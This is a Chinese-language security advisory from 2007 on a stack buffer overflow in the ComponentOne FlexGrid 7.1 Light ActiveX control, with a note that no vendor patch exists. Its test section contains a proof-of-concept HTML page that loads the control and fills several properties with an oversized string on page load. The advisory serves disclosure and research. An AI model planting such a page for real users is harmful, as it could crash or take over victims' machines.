发布日期：2007-11-15
更新日期：2007-11-19

受影响系统：

ComponentOne FlexGrid 7.1 Light

描述：

---

BUGTRAQ  ID: 26467

ComponentOne FlexGrid是用于创建各种用户界面的表格控件工具。

FlexGrid控件实现上存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制用户系统。

FlexGrid控件（VSFlexGrid.VSFlexGridL）没有正确地验证某些用户输入参数，如果用户受骗访问了恶意站点的话，就可能触发栈溢出，导致执行任意指令。

<*来源：Elazar Broad （elazarb@earthlink.net）
  
  链接：http://marc.info/?l=full-disclosure&m=119517573408574&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>
  <script language="JavaScript" DEFER>
    function Check() {
     var s = "AAAA";

     while (s.length < 262145) s=s+s;
  
     var obj = new ActiveXObject("VSFlexGrid.VSFlexGridL");
    
     obj.Text = s;
     obj.EditSelText = s;
     obj.EditText = s;
     obj.CellFontName = s;
   }
  </script>

</head>  
<body onload="JavaScript: return Check();" />
</html>

建议：

---

厂商补丁：

ComponentOne
------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.componentone.com/

浏览次数：2558
严重程度：0（网友投票）